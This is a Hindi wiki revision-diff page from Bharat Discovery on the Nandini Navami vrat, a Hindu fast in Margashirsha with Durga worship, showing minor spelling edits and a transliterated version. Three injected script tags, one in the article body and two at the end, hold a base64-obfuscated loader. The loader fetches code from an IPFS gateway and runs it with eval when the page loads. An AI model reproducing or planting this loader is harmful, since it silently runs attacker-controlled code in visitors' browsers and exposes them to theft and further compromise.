Difference between revisions of "नन्दिनी नवमी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] की नवमी को यह व्रत किया जाता है।
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] की नवमी को यह व्रत किया जाता है।
 
*इस व्रत में [[दुर्गा]] की पूजा की जाती है।  
 
*इस व्रत में [[दुर्गा]] की पूजा की जाती है।  
 
*वर्ष को दो भागों में बाँटा जाता है।
 
*वर्ष को दो भागों में बाँटा जाता है।
 
*तीन दिनों तक उपवास रखा जाता है।
 
*तीन दिनों तक उपवास रखा जाता है।
*6 मासों की अवधि में विभिन्न पुष्प एवं विभिन्न नाम लिये जाते है।
+
*6 मासों की अवधि में विभिन्न पुष्प एवं विभिन्न नाम लिये जाते हैं।
 
*कर्ता स्वर्ग को जाता है और शक्तिशाली राजा के रूप में लौटता है।<ref>कृत्यकल्पतरु (व्रत0, 3202-303)। देखिए ऊपर 'त्रितयप्रदानसप्तमी'।</ref>
 
*कर्ता स्वर्ग को जाता है और शक्तिशाली राजा के रूप में लौटता है।<ref>कृत्यकल्पतरु (व्रत0, 3202-303)। देखिए ऊपर 'त्रितयप्रदानसप्तमी'।</ref>
 
 
 
 
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 09:41, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shukl paksh ki navami ko yah vrat kiya jata hai.
  • is vrat mean durga ki pooja ki jati hai.
  • varsh ko do bhagoan mean baanta jata hai.
  • tin dinoan tak upavas rakha jata hai.
  • 6 masoan ki avadhi mean vibhinn pushp evan vibhinn nam liye jate haian.
  • karta svarg ko jata hai aur shaktishali raja ke roop mean lautata hai.[1]

  <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vrat0, 3202-303). dekhie oopar 'tritayapradanasaptami'.

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>